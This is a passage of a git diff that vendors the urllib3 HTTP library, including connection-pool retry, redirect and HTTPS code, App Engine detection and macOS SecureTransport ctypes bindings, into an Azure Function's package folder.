None: + headers = self.headers + + if not isinstance(retries, Retry): + retries = Retry.from_int(retries, redirect=redirect, default=self.retries) + + if release_conn is None: + release_conn = response_kw.get("preload_content", True) + + # Check host + if assert_same_host and not self.is_same_host(url): + raise HostChangedError(self, url, retries) + + # Ensure that the URL we're connecting to is properly encoded + if url.startswith("/"): + url = six.ensure_str(_encode_target(url)) + else: + url = six.ensure_str(parsed_url.url) + + conn = None + + # Track whether `conn` needs to be released before + # returning/raising/recursing. Update this variable if necessary, and + # leave `release_conn` constant throughout the function. 
That way, if + # the function recurses, the original value of `release_conn` will be + # passed down into the recursive call, and its value will be respected. + # + # See issue #651 [1] for details. + # + # [1] + release_this_conn = release_conn + + http_tunnel_required = connection_requires_http_tunnel( + self.proxy, self.proxy_config, destination_scheme + ) + + # Merge the proxy headers. Only done when not using HTTP CONNECT. We + # have to copy the headers dict so we can safely change it without those + # changes being reflected in anyone else's copy. + if not http_tunnel_required: + headers = headers.copy() + headers.update(self.proxy_headers) + + # Must keep the exception bound to a separate variable or else Python 3 + # complains about UnboundLocalError. + err = None + + # Keep track of whether we cleanly exited the except block. This + # ensures we do proper cleanup in finally. + clean_exit = False + + # Rewind body position, if needed. Record current position + # for future rewinds in the event of a redirect/retry. + body_pos = set_file_position(body, body_pos) + + try: + # Request a connection from the queue. + timeout_obj = self._get_timeout(timeout) + conn = self._get_conn(timeout=pool_timeout) + + conn.timeout = timeout_obj.connect_timeout + + is_new_proxy_conn = self.proxy is not None and not getattr( + conn, "sock", None + ) + if is_new_proxy_conn and http_tunnel_required: + self._prepare_proxy(conn) + + # Make the request on the httplib connection object. + httplib_response = self._make_request( + conn, + method, + url, + timeout=timeout_obj, + body=body, + headers=headers, + chunked=chunked, + ) + + # If we're going to release the connection in ``finally:``, then + # the response doesn't need to know about the connection. Otherwise + # it will also try to release it and we'll have a double-release + # mess. + response_conn = conn if not release_conn else None + + # Pass method to Response for length checking + response_kw["request_method"] = method + + # Import httplib's response into our own wrapper object + response = self.ResponseCls.from_httplib( + httplib_response, + pool=self, + connection=response_conn, + retries=retries, + **response_kw + ) + + # Everything went great! + clean_exit = True + + except EmptyPoolError: + # Didn't get a connection from the pool, no need to clean up + clean_exit = True + release_this_conn = False + raise + + except ( + TimeoutError, + HTTPException, + SocketError, + ProtocolError, + BaseSSLError, + SSLError, + CertificateError, + ) as e: + # Discard the connection for these exceptions. It will be + # replaced during the next _get_conn() call. + clean_exit = False + + def _is_ssl_error_message_from_http_proxy(ssl_error): + # We're trying to detect the message 'WRONG_VERSION_NUMBER' but + # SSLErrors are kinda all over the place when it comes to the message, + # so we try to cover our bases here! + message = " ".join(re.split("[^a-z]", str(ssl_error).lower())) + return ( + "wrong version number" in message or "unknown protocol" in message + ) + + # Try to detect a common user error with proxies which is to + # set an HTTP proxy to be HTTPS when it should be 'http://' + # (ie {'http': 'http://proxy', 'https': 'https://proxy'}) + # Instead we add a nice error message and point to a URL. + if ( + isinstance(e, BaseSSLError) + and self.proxy + and _is_ssl_error_message_from_http_proxy(e) + ): + e = ProxyError( + "Your proxy appears to only use HTTP and not HTTPS, " + "try changing your proxy URL to be HTTP. 
See: " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#https-proxy-error-http-proxy", + SSLError(e), + ) + elif isinstance(e, (BaseSSLError, CertificateError)): + e = SSLError(e) + elif isinstance(e, (SocketError, NewConnectionError)) and self.proxy: + e = ProxyError("Cannot connect to proxy.", e) + elif isinstance(e, (SocketError, HTTPException)): + e = ProtocolError("Connection aborted.", e) + + retries = retries.increment( + method, url, error=e, _pool=self, _stacktrace=sys.exc_info()[2] + ) + retries.sleep() + + # Keep track of the error for the retry warning. + err = e + + finally: + if not clean_exit: + # We hit some kind of exception, handled or otherwise. We need + # to throw the connection away unless explicitly told not to. + # Close the connection, set the variable to None, and make sure + # we put the None back in the pool to avoid leaking it. + conn = conn and conn.close() + release_this_conn = True + + if release_this_conn: + # Put the connection back to be reused. If the connection is + # expired then it will be None, which will get replaced with a + # fresh connection during _get_conn. + self._put_conn(conn) + + if not conn: + # Try again + log.warning( + "Retrying (%r) after connection broken by '%r': %s", retries, err, url + ) + return self.urlopen( + method, + url, + body, + headers, + retries, + redirect, + assert_same_host, + timeout=timeout, + pool_timeout=pool_timeout, + release_conn=release_conn, + chunked=chunked, + body_pos=body_pos, + **response_kw + ) + + # Handle redirect? + redirect_location = redirect and response.get_redirect_location() + if redirect_location: + if response.status == 303: + method = "GET" + + try: + retries = retries.increment(method, url, response=response, _pool=self) + except MaxRetryError: + if retries.raise_on_redirect: + response.drain_conn() + raise + return response + + response.drain_conn() + retries.sleep_for_retry(response) + log.debug("Redirecting %s -> %s", url, redirect_location) + return self.urlopen( + method, + redirect_location, + body, + headers, + retries=retries, + redirect=redirect, + assert_same_host=assert_same_host, + timeout=timeout, + pool_timeout=pool_timeout, + release_conn=release_conn, + chunked=chunked, + body_pos=body_pos, + **response_kw + ) + + # Check if we should retry the HTTP response. + has_retry_after = bool(response.getheader("Retry-After")) + if retries.is_retry(method, response.status, has_retry_after): + try: + retries = retries.increment(method, url, response=response, _pool=self) + except MaxRetryError: + if retries.raise_on_status: + response.drain_conn() + raise + return response + + response.drain_conn() + retries.sleep(response) + log.debug("Retry: %s", url) + return self.urlopen( + method, + url, + body, + headers, + retries=retries, + redirect=redirect, + assert_same_host=assert_same_host, + timeout=timeout, + pool_timeout=pool_timeout, + release_conn=release_conn, + chunked=chunked, + body_pos=body_pos, + **response_kw + ) + + return response + + +class HTTPSConnectionPool(HTTPConnectionPool): + """ + Same as :class:`.HTTPConnectionPool`, but HTTPS. + + :class:`.HTTPSConnection` uses one of ``assert_fingerprint``, + ``assert_hostname`` and ``host`` in this order to verify connections. + If ``assert_hostname`` is False, no verification is done. 
+ + The ``key_file``, ``cert_file``, ``cert_reqs``, ``ca_certs``, + ``ca_cert_dir``, ``ssl_version``, ``key_password`` are only used if :mod:`ssl` + is available and are fed into :meth:`urllib3.util.ssl_wrap_socket` to upgrade + the connection socket into an SSL socket. + """ + + scheme = "https" + ConnectionCls = HTTPSConnection + + def __init__( + self, + host, + port=None, + strict=False, + timeout=Timeout.DEFAULT_TIMEOUT, + maxsize=1, + block=False, + headers=None, + retries=None, + _proxy=None, + _proxy_headers=None, + key_file=None, + cert_file=None, + cert_reqs=None, + key_password=None, + ca_certs=None, + ssl_version=None, + assert_hostname=None, + assert_fingerprint=None, + ca_cert_dir=None, + **conn_kw + ): + + HTTPConnectionPool.__init__( + self, + host, + port, + strict, + timeout, + maxsize, + block, + headers, + retries, + _proxy, + _proxy_headers, + **conn_kw + ) + + self.key_file = key_file + self.cert_file = cert_file + self.cert_reqs = cert_reqs + self.key_password = key_password + self.ca_certs = ca_certs + self.ca_cert_dir = ca_cert_dir + self.ssl_version = ssl_version + self.assert_hostname = assert_hostname + self.assert_fingerprint = assert_fingerprint + + def _prepare_conn(self, conn): + """ + Prepare the ``connection`` for :meth:`urllib3.util.ssl_wrap_socket` + and establish the tunnel if proxy is used. + """ + + if isinstance(conn, VerifiedHTTPSConnection): + conn.set_cert( + key_file=self.key_file, + key_password=self.key_password, + cert_file=self.cert_file, + cert_reqs=self.cert_reqs, + ca_certs=self.ca_certs, + ca_cert_dir=self.ca_cert_dir, + assert_hostname=self.assert_hostname, + assert_fingerprint=self.assert_fingerprint, + ) + conn.ssl_version = self.ssl_version + return conn + + def _prepare_proxy(self, conn): + """ + Establishes a tunnel connection through HTTP CONNECT. + + Tunnel connection is established early because otherwise httplib would + improperly set Host: header to proxy's IP:port. + """ + + conn.set_tunnel(self._proxy_host, self.port, self.proxy_headers) + + if self.proxy.scheme == "https": + conn.tls_in_tls_required = True + + conn.connect() + + def _new_conn(self): + """ + Return a fresh :class:`http.client.HTTPSConnection`. + """ + self.num_connections += 1 + log.debug( + "Starting new HTTPS connection (%d): %s:%s", + self.num_connections, + self.host, + self.port or "443", + ) + + if not self.ConnectionCls or self.ConnectionCls is DummyConnection: + raise SSLError( + "Can't connect to HTTPS URL because the SSL module is not available." + ) + + actual_host = self.host + actual_port = self.port + if self.proxy is not None: + actual_host = self.proxy.host + actual_port = self.proxy.port + + conn = self.ConnectionCls( + host=actual_host, + port=actual_port, + timeout=self.timeout.connect_timeout, + strict=self.strict, + cert_file=self.cert_file, + key_file=self.key_file, + key_password=self.key_password, + **self.conn_kw + ) + + return self._prepare_conn(conn) + + def _validate_conn(self, conn): + """ + Called right before a request is made, after the socket is created. + """ + super(HTTPSConnectionPool, self)._validate_conn(conn) + + # Force connect early to allow us to validate the connection. + if not getattr(conn, "sock", None): # AppEngine might not have `.sock` + conn.connect() + + if not conn.is_verified: + warnings.warn( + ( + "Unverified HTTPS request is being made to host '%s'. " + "Adding certificate verification is strongly advised. 
See: " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings" % conn.host + ), + InsecureRequestWarning, + ) + + if getattr(conn, "proxy_is_verified", None) is False: + warnings.warn( + ( + "Unverified HTTPS connection done to an HTTPS proxy. " + "Adding certificate verification is strongly advised. See: " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings" + ), + InsecureRequestWarning, + ) + + +def connection_from_url(url, **kw): + """ + Given a url, return an :class:`.ConnectionPool` instance of its host. + + This is a shortcut for not having to parse out the scheme, host, and port + of the url before creating an :class:`.ConnectionPool` instance. + + :param url: + Absolute URL string that must include the scheme. Port is optional. + + :param \\**kw: + Passes additional parameters to the constructor of the appropriate + :class:`.ConnectionPool`. Useful for specifying things like + timeout, maxsize, headers, etc. + + Example:: + + >>> conn = connection_from_url('http://google.com/') + >>> r = conn.request('GET', '/') + """ + scheme, host, port = get_host(url) + port = port or port_by_scheme.get(scheme, 80) + if scheme == "https": + return HTTPSConnectionPool(host, port=port, **kw) + else: + return HTTPConnectionPool(host, port=port, **kw) + + +def _normalize_host(host, scheme): + """ + Normalize hosts for comparisons and use with sockets. + """ + + host = normalize_host(host, scheme) + + # httplib doesn't like it when we include brackets in IPv6 addresses + # Specifically, if we include brackets but also pass the port then + # httplib crazily doubles up the square brackets on the Host header. + # Instead, we need to make sure we never pass ``None`` as the port. + # However, for backward compatibility reasons we can't actually + # *assert* that. 
See http://bugs.python.org/issue28539 + if host.startswith("[") and host.endswith("]"): + host = host[1:-1] + return host diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..1189735 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc new file mode 100644 index 0000000..d9bcb2f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/_appengine_environ.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/appengine.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/appengine.cpython-39.pyc new file mode 100644 index 0000000..6f7b5b3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/appengine.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc new file mode 100644 index 0000000..0500dde Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/ntlmpool.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc new file mode 100644 index 0000000..a9d5093 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/pyopenssl.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-39.pyc new file mode 100644 index 0000000..662e8e3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/securetransport.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/socks.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/socks.cpython-39.pyc new file mode 100644 index 0000000..d2b101c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/__pycache__/socks.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_appengine_environ.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_appengine_environ.py new file mode 100644 index 0000000..453d62d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_appengine_environ.py @@ -0,0 +1,36 @@ +""" +This module provides means to detect the App Engine environment. +""" + +import os + + +def is_appengine(): + return is_local_appengine() or is_prod_appengine() + + +def is_appengine_sandbox(): + """Reports if the app is running in the first generation sandbox. + + The second generation runtimes are technically still in a sandbox, but it + is much less restrictive, so generally you shouldn't need to check for it. + see https://cloud.google.com/appengine/docs/standard/runtimes + """ + return is_appengine() and os.environ["APPENGINE_RUNTIME"] == "python27" + + +def is_local_appengine(): + return "APPENGINE_RUNTIME" in os.environ and os.environ.get( + "SERVER_SOFTWARE", "" + ).startswith("Development/") + + +def is_prod_appengine(): + return "APPENGINE_RUNTIME" in os.environ and os.environ.get( + "SERVER_SOFTWARE", "" + ).startswith("Google App Engine/") + + +def is_prod_appengine_mvms(): + """Deprecated.""" + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..156e778 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc new file mode 100644 index 0000000..0773814 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/bindings.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc new file mode 100644 index 0000000..d93782b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/__pycache__/low_level.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/bindings.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/bindings.py new file mode 100644 index 0000000..56e799a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/contrib/_securetransport/bindings.py @@ -0,0 +1,519 @@ +""" +This module uses ctypes to bind a whole bunch of functions and constants from +SecureTransport. The goal here is to provide the low-level API to +SecureTransport. These are essentially the C-level functions and constants, and +they're pretty gross to work with. + +This code is a bastardised version of the code found in Will Bond's oscrypto +library. An enormous debt is owed to him for blazing this trail for us. For +that reason, this code should be considered to be covered both by urllib3's +license and by oscrypto's: + + Copyright (c) 2015-2016 Will Bond + + Permission is hereby granted, free of charge, to any person obtaining a + copy of this software and associated documentation files (the "Software"), + to deal in the Software without restriction, including without limitation + the rights to use, copy, modify, merge, publish, distribute, sublicense, + and/or sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included in + all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER + DEALINGS IN THE SOFTWARE. +""" +from __future__ import absolute_import + +import platform +from ctypes import ( + CDLL, + CFUNCTYPE, + POINTER, + c_bool, + c_byte, + c_char_p, + c_int32, + c_long, + c_size_t, + c_uint32, + c_ulong, + c_void_p, +) +from ctypes.util import find_library + +from ...packages.six import raise_from + +if platform.system() != "Darwin": + raise ImportError("Only macOS is supported") + +version = platform.mac_ver()[0] +version_info = tuple(map(int, version.split("."))) +if version_info < (10, 8): + raise OSError( + "Only OS X 10.8 and newer are supported, not %s.%s" + % (version_info[0], version_info[1]) + ) + + +def load_cdll(name, macos10_16_path): + """Loads a CDLL by name, falling back to known path on 10.16+""" + try: + # Big Sur is technically 11 but we use 10.16 due to the Big Sur + # beta being labeled as 10.16. 
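+        # (For example, platform.mac_ver()[0] == "11.6" yields
+        # version_info == (11, 6), which also satisfies this check.)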
+ if version_info >= (10, 16): + path = macos10_16_path + else: + path = find_library(name) + if not path: + raise OSError # Caught and reraised as 'ImportError' + return CDLL(path, use_errno=True) + except OSError: + raise_from(ImportError("The library %s failed to load" % name), None) + + +Security = load_cdll( + "Security", "/System/Library/Frameworks/Security.framework/Security" +) +CoreFoundation = load_cdll( + "CoreFoundation", + "/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", +) + + +Boolean = c_bool +CFIndex = c_long +CFStringEncoding = c_uint32 +CFData = c_void_p +CFString = c_void_p +CFArray = c_void_p +CFMutableArray = c_void_p +CFDictionary = c_void_p +CFError = c_void_p +CFType = c_void_p +CFTypeID = c_ulong + +CFTypeRef = POINTER(CFType) +CFAllocatorRef = c_void_p + +OSStatus = c_int32 + +CFDataRef = POINTER(CFData) +CFStringRef = POINTER(CFString) +CFArrayRef = POINTER(CFArray) +CFMutableArrayRef = POINTER(CFMutableArray) +CFDictionaryRef = POINTER(CFDictionary) +CFArrayCallBacks = c_void_p +CFDictionaryKeyCallBacks = c_void_p +CFDictionaryValueCallBacks = c_void_p + +SecCertificateRef = POINTER(c_void_p) +SecExternalFormat = c_uint32 +SecExternalItemType = c_uint32 +SecIdentityRef = POINTER(c_void_p) +SecItemImportExportFlags = c_uint32 +SecItemImportExportKeyParameters = c_void_p +SecKeychainRef = POINTER(c_void_p) +SSLProtocol = c_uint32 +SSLCipherSuite = c_uint32 +SSLContextRef = POINTER(c_void_p) +SecTrustRef = POINTER(c_void_p) +SSLConnectionRef = c_uint32 +SecTrustResultType = c_uint32 +SecTrustOptionFlags = c_uint32 +SSLProtocolSide = c_uint32 +SSLConnectionType = c_uint32 +SSLSessionOption = c_uint32 + + +try: + Security.SecItemImport.argtypes = [ + CFDataRef, + CFStringRef, + POINTER(SecExternalFormat), + POINTER(SecExternalItemType), + SecItemImportExportFlags, + POINTER(SecItemImportExportKeyParameters), + SecKeychainRef, + POINTER(CFArrayRef), + ] + Security.SecItemImport.restype = OSStatus + + Security.SecCertificateGetTypeID.argtypes = [] + Security.SecCertificateGetTypeID.restype = CFTypeID + + Security.SecIdentityGetTypeID.argtypes = [] + Security.SecIdentityGetTypeID.restype = CFTypeID + + Security.SecKeyGetTypeID.argtypes = [] + Security.SecKeyGetTypeID.restype = CFTypeID + + Security.SecCertificateCreateWithData.argtypes = [CFAllocatorRef, CFDataRef] + Security.SecCertificateCreateWithData.restype = SecCertificateRef + + Security.SecCertificateCopyData.argtypes = [SecCertificateRef] + Security.SecCertificateCopyData.restype = CFDataRef + + Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p] + Security.SecCopyErrorMessageString.restype = CFStringRef + + Security.SecIdentityCreateWithCertificate.argtypes = [ + CFTypeRef, + SecCertificateRef, + POINTER(SecIdentityRef), + ] + Security.SecIdentityCreateWithCertificate.restype = OSStatus + + Security.SecKeychainCreate.argtypes = [ + c_char_p, + c_uint32, + c_void_p, + Boolean, + c_void_p, + POINTER(SecKeychainRef), + ] + Security.SecKeychainCreate.restype = OSStatus + + Security.SecKeychainDelete.argtypes = [SecKeychainRef] + Security.SecKeychainDelete.restype = OSStatus + + Security.SecPKCS12Import.argtypes = [ + CFDataRef, + CFDictionaryRef, + POINTER(CFArrayRef), + ] + Security.SecPKCS12Import.restype = OSStatus + + SSLReadFunc = CFUNCTYPE(OSStatus, SSLConnectionRef, c_void_p, POINTER(c_size_t)) + SSLWriteFunc = CFUNCTYPE( + OSStatus, SSLConnectionRef, POINTER(c_byte), POINTER(c_size_t) + ) + + Security.SSLSetIOFuncs.argtypes = [SSLContextRef, SSLReadFunc, SSLWriteFunc] + 
Security.SSLSetIOFuncs.restype = OSStatus + + Security.SSLSetPeerID.argtypes = [SSLContextRef, c_char_p, c_size_t] + Security.SSLSetPeerID.restype = OSStatus + + Security.SSLSetCertificate.argtypes = [SSLContextRef, CFArrayRef] + Security.SSLSetCertificate.restype = OSStatus + + Security.SSLSetCertificateAuthorities.argtypes = [SSLContextRef, CFTypeRef, Boolean] + Security.SSLSetCertificateAuthorities.restype = OSStatus + + Security.SSLSetConnection.argtypes = [SSLContextRef, SSLConnectionRef] + Security.SSLSetConnection.restype = OSStatus + + Security.SSLSetPeerDomainName.argtypes = [SSLContextRef, c_char_p, c_size_t] + Security.SSLSetPeerDomainName.restype = OSStatus + + Security.SSLHandshake.argtypes = [SSLContextRef] + Security.SSLHandshake.restype = OSStatus + + Security.SSLRead.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)] + Security.SSLRead.restype = OSStatus + + Security.SSLWrite.argtypes = [SSLContextRef, c_char_p, c_size_t, POINTER(c_size_t)] + Security.SSLWrite.restype = OSStatus + + Security.SSLClose.argtypes = [SSLContextRef] + Security.SSLClose.restype = OSStatus + + Security.SSLGetNumberSupportedCiphers.argtypes = [SSLContextRef, POINTER(c_size_t)] + Security.SSLGetNumberSupportedCiphers.restype = OSStatus + + Security.SSLGetSupportedCiphers.argtypes = [ + SSLContextRef, + POINTER(SSLCipherSuite), + POINTER(c_size_t), + ] + Security.SSLGetSupportedCiphers.restype = OSStatus + + Security.SSLSetEnabledCiphers.argtypes = [ + SSLContextRef, + POINTER(SSLCipherSuite), + c_size_t, + ] + Security.SSLSetEnabledCiphers.restype = OSStatus + + Security.SSLGetNumberEnabledCiphers.argtype = [SSLContextRef, POINTER(c_size_t)] + Security.SSLGetNumberEnabledCiphers.restype = OSStatus + + Security.SSLGetEnabledCiphers.argtypes = [ + SSLContextRef, + POINTER(SSLCipherSuite), + POINTER(c_size_t), + ] + Security.SSLGetEnabledCiphers.restype = OSStatus + + Security.SSLGetNegotiatedCipher.argtypes = [SSLContextRef, POINTER(SSLCipherSuite)] + Security.SSLGetNegotiatedCipher.restype = OSStatus + + Security.SSLGetNegotiatedProtocolVersion.argtypes = [ + SSLContextRef, + POINTER(SSLProtocol), + ] + Security.SSLGetNegotiatedProtocolVersion.restype = OSStatus + + Security.SSLCopyPeerTrust.argtypes = [SSLContextRef, POINTER(SecTrustRef)] + Security.SSLCopyPeerTrust.restype = OSStatus + + Security.SecTrustSetAnchorCertificates.argtypes = [SecTrustRef, CFArrayRef] + Security.SecTrustSetAnchorCertificates.restype = OSStatus + + Security.SecTrustSetAnchorCertificatesOnly.argstypes = [SecTrustRef, Boolean] + Security.SecTrustSetAnchorCertificatesOnly.restype = OSStatus + + Security.SecTrustEvaluate.argtypes = [SecTrustRef, POINTER(SecTrustResultType)] + Security.SecTrustEvaluate.restype = OSStatus + + Security.SecTrustGetCertificateCount.argtypes = [SecTrustRef] + Security.SecTrustGetCertificateCount.restype = CFIndex + + Security.SecTrustGetCertificateAtIndex.argtypes = [SecTrustRef, CFIndex] + Security.SecTrustGetCertificateAtIndex.restype = SecCertificateRef + + Security.SSLCreateContext.argtypes = [ + CFAllocatorRef, + SSLProtocolSide, + SSLConnectionType, + ] + Security.SSLCreateContext.restype = SSLContextRef + + Security.SSLSetSessionOption.argtypes = [SSLContextRef, SSLSessionOption, Boolean] + Security.SSLSetSessionOption.restype = OSStatus + + Security.SSLSetProtocolVersionMin.argtypes = [SSLContextRef, SSLProtocol] + Security.SSLSetProtocolVersionMin.restype = OSStatus + + Security.SSLSetProtocolVersionMax.argtypes = [SSLContextRef, SSLProtocol] + 
Security.SSLSetProtocolVersionMax.restype = OSStatus + + try: + Security.SSLSetALPNProtocols.argtypes = [SSLContextRef, CFArrayRef] + Security.SSLSetALPNProtocols.restype = OSStatus + except AttributeError: + # Supported only in 10.12+ + pass + + Security.SecCopyErrorMessageString.argtypes = [OSStatus, c_void_p] + Security.SecCopyErrorMessageString.restype = CFStringRef + + Security.SSLReadFunc = SSLReadFunc + Security.SSLWriteFunc = SSLWriteFunc + Security.SSLContextRef = SSLContextRef + Security.SSLProtocol = SSLProtocol + Security.SSLCipherSuite = SSLCipherSuite + Security.SecIdentityRef = SecIdentityRef + Security.SecKeychainRef = SecKeychainRef + Security.SecTrustRef = SecTrustRef + Security.SecTrustResultType = SecTrustResultType + Security.SecExternalFormat = SecExternalFormat + Security.OSStatus = OSStatus + + Security.kSecImportExportPassphrase = CFStringRef.in_dll( + Security, "kSecImportExportPassphrase" + ) + Security.kSecImportItemIdentity = CFStringRef.in_dll( + Security, "kSecImportItemIdentity" + ) + + # CoreFoundation time! + CoreFoundation.CFRetain.argtypes = [CFTypeRef] + CoreFoundation.CFRetain.restype = CFTypeRef + + CoreFoundation.CFRelease.argtypes = [CFTypeRef] + CoreFoundation.CFRelease.restype = None + + CoreFoundation.CFGetTypeID.argtypes = [CFTypeRef] + CoreFoundation.CFGetTypeID.restype = CFTypeID + + CoreFoundation.CFStringCreateWithCString.argtypes = [ + CFAllocatorRef, + c_char_p, + CFStringEncoding, + ] + CoreFoundation.CFStringCreateWithCString.restype = CFStringRef + + CoreFoundation.CFStringGetCStringPtr.argtypes = [CFStringRef, CFStringEncoding] + CoreFoundation.CFStringGetCStringPtr.restype = c_char_p + + CoreFoundation.CFStringGetCString.argtypes = [ + CFStringRef, + c_char_p, + CFIndex, + CFStringEncoding, + ] + CoreFoundation.CFStringGetCString.restype = c_bool + + CoreFoundation.CFDataCreate.argtypes = [CFAllocatorRef, c_char_p, CFIndex] + CoreFoundation.CFDataCreate.restype = CFDataRef + + CoreFoundation.CFDataGetLength.argtypes = [CFDataRef] + CoreFoundation.CFDataGetLength.restype = CFIndex + + CoreFoundation.CFDataGetBytePtr.argtypes = [CFDataRef] + CoreFoundation.CFDataGetBytePtr.restype = c_void_p + + CoreFoundation.CFDictionaryCreate.argtypes = [ + CFAllocatorRef, + POINTER(CFTypeRef), + POINTER(CFTypeRef), + CFIndex, + CFDictionaryKeyCallBacks, + CFDictionaryValueCallBacks, + ] + CoreFoundation.CFDictionaryCreate.restype = CFDictionaryRef + + CoreFoundation.CFDictionaryGetValue.argtypes = [CFDictionaryRef, CFTypeRef] + CoreFoundation.CFDictionaryGetValue.restype = CFTypeRef + + CoreFoundation.CFArrayCreate.argtypes = [ + CFAllocatorRef, + POINTER(CFTypeRef), + CFIndex, + CFArrayCallBacks, + ] + CoreFoundation.CFArrayCreate.restype = CFArrayRef + + CoreFoundation.CFArrayCreateMutable.argtypes = [ + CFAllocatorRef, + CFIndex, + CFArrayCallBacks, + ] + CoreFoundation.CFArrayCreateMutable.restype = CFMutableArrayRef + + CoreFoundation.CFArrayAppendValue.argtypes = [CFMutableArrayRef, c_void_p] + CoreFoundation.CFArrayAppendValue.restype = None + + CoreFoundation.CFArrayGetCount.argtypes = [CFArrayRef] + CoreFoundation.CFArrayGetCount.restype = CFIndex + + CoreFoundation.CFArrayGetValueAtIndex.argtypes = 